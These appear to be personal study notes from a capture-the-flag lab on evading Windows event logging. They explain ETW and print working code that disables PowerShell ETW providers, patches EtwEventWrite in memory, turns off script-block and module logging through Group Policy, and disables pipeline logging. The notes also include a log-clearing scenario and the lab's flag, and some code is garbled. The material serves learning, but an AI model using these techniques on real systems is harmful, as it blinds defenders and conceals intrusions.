Evading Logging and Monitoring1 day at a time

-SIEM (Security Information and Event Manager) -primary target for an attacker is event logs managed by ETW -ETW (Envent Tracing for Windows)

Event tracing -ETW handle logging at application and kernel levels -event Ids are core feature of windows logging -events are sent and transferred in XML (Extensible Markup Language) -events that could be generated when carrying out operation can disrupt goals of attacker

componenets -Controllers: build and configure sessions -Providers: generate events -Consumer: interpret events

Windows event id log list https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx

Approaches to log evasion -typical log forwarding is employed -log forwarding: move logs from the host machine to a central server or indexer so they won’t be modified later 1102: logs when the windows security audit log was cleared 104: logs when the log file was cleared 1100: logs when the windows event log service was shut down -process of deleting logs risks operational security

Tracing instrumentation -controller define size and location of the log file, start and stop event tracing sessions, enable providers, manage size of buffer pool, obtain execution stats -providers contain event tracing instrumentation four types of providers

MOF (managed object format): defines events from MOF classes. Enabled by one trace session at a time
WPP (windows software trace preprocessor): associated with TMF (trace message format) files to decode info. enabled by one trace session at a time.
Manifest-Based: Defines events from a manifest. enabled by up to eight trace sessions at a time
TraceLogging: self-describing events containing all required information. enabled by up to eight trace sessions at a time -consumers are applications that select one or more event tracig sessions as a source of events. can get stored or real time events

techniques to target each ETW component Provider → PSEtwLogProvider Modification, Group Policy Takeover, Log Pipeline Abuse, Type Creation Controller → Patching EtwEventWrite, Runtime Tracing Tampering, Consumers → Log Smashing, Log Tampering

Inside .NET assembly - information about assembly contents - metadata .NET assembly: PSEtwLogProvider

-obtain .NET assembly for PSEtwLogProvider $logProvider = [Ref].Assembly.GetType(‘System.Management.Automation.Tracing.PSEtwLogProvider’)

-store a null value for etwProvider $e twP ro v i d er =$ logProvider.GetField(‘etwProvider’,‘NonPublic,Static’).GetValue($null)

-set field for m_enabled to previously stored value [System.Diagnostics.Eventing.EventProvider].GetField(‘m_enabled’,‘NonPublic,Instance’).SetValue($etwProvider,0);

-compile into one ps file -run other code

Patching Tracing Function -ETW loaded from runtime of every new process - CLR (common language runtime) -can write pre-defined opcodes to an in-memory function to disable functionalities -LIFO - last in first out structure -ETW is written from the function EtwEventWrite

-assembly ret 14h will end the function and return to previous application -steps:

obtain handle for EtwEventWrite var ntdll = Win32.LoadLibrary(“ntdll.dll”); var etwFunction = Win32.GetProcAddress(ntdll, “EtwEventWrite”);
Modify Memory permissions of the function - flNewProtect - 0x40 enables X,R,RW uint oldProtect; Win32.VirtualProtect( etwFunction, (UIntPtr)patch.Length, 0x40, out oldProtect );
Write opcode bytes to memory - Marshal.Copy to write opcode patch(new byte[] { 0xc2, 0x14, 0x00 }); Marshal.Copy( patch, 0, etwEventSend, patch.Length );
Reset memory permissions of the function VirtualProtect(etwFunction, 4, oldProtect, &oldOldProtect);
Flush the instruction cache Win32.FlushInstructionCache( etwFunction, NULL );

Providers via policy -Group Policy object - enable policies -Script block logging - 4104: -expose scripts of attackers if not properly obfuscated

-Module logging - 4103: -log any modules and data sent from it -each session logs its own module

-goal of disabling these providers is to limit the visibility of components require while making the env seem untrampered

Group policy takeover

Obtain group policy settings from the utility cache -reflection $G ro u pP o l i cy S e tt in g s F i e l d = [re f] . A sse mb l y . G e tT y p e (^{'} S ys t e m . M ana g e m e n t . A u t o ma t i o n . U t i l s^{'}) . G e tF i e l d (^{'} c a c h e d G ro u pP o l i cy S e tt in g s^{'},^{'} N o n P u b l i c, St a t i c^{'})$ GroupPolicySettings = $G ro u pP o l i cy S e tt in g s F i e l d . G e t Va l u e ($ null)
Modify generic provider to 0 -GPO variable setting to 0 $G ro u pP o l i cy S e tt in g s [^{'} S cr i ptBl oc k L o gg in g^{'}] [^{'} E nab l e S cr i ptBl oc k L o gg in g^{'}] = 0//4104$ GroupPolicySettings[‘ScriptBlockLogging’][‘EnableScriptBlockInvocationLogging’] = 0 //4103 -compile together and append to malicious ps script
Modify the incovation or module definition

Abusing log pipeline

Obtain target module $module = Get-Module Microsoft.PowerShell.Utility # Get target module
Set module execution details to $f a l se$ module.LogPipelineExecutionDetails = $false # Set module execution details to false
Obtain the module snap-in $snap = Get-PSSnapin Microsoft.PowerShell.Core # Get target ps-snapin
set snap-in execution details to $f a l se$ snap.LogPipelineExecutionDetails = $false # Set ps-snapin execution details to false

Real world scenario

steps: run powershell .\gpo-bypass.ps1 -clear logs from event viewer and disable logs .\agent.exe

THM{51l3n7_l1k3_4_5n4k3}

Real World Scenario

0xor1day

Explorer

Evading Logging and Monitoring

Windows event id log list https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx

Graph View